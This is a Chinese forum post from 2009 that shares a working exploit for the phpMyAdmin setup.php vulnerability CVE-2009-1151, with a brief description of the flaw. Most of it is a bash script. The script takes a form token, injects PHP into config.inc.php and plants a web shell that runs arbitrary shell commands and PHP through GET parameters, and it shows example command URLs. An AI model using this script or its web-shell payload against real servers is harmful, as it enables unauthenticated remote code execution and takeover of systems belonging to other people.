|
|
..我第一次看到是在国外的0day站..现在被公布出来了。官方也出了补丁危害也不会很大了,发出来吧。
系统编号:
BugCVE:CVE-2009-1151
BugTraq:34234
影响版本:
phpMyadmin 2.11.x/3.x
漏洞分析:
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
利用脚本(Linux):
#!/bin/bash
if [[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
exit
fi
if ! which curl >/dev/null
then
echo "sorry but you need curl for this script to work!"
echo "on Debian/Ubuntu: sudo apt-get install curl"
exit
fi
function exploit {
postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
echo "[+] attempting to inject phpinfo() ..."
curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null
if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
then
curl -ks --url "$3/config/config.inc.php" >$flag
echo "[+] success! phpinfo() injected successfully! output saved on $flag"
curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
echo " $3/config/config.inc.php?c=ls+-l+/"
echo " $3/config/config.inc.php?p=phpinfo();"
echo " please send any feedback/improvements for this script to"\
"unknown.pentester<AT_sign__here>gmail.com"
else
echo "[+] no luck injecting to $3/config/config.inc.php :("
exit
fi
}
# end of exploit function
cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."
#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
length=`echo -n $token | wc -c`
# valid form token obtained?
if [[ $length -eq 32 ]]
then
echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
# attempt exploit!
exploit $token $cookiejar $1
else
echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
exit
fi
else
echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
exit
fi
有兴趣的可以再虚拟机上测试下。 |
|
发表于 2009-6-22 23:23:36
发表于 2009-6-23 11:24:25
,顺便消灭0回复.
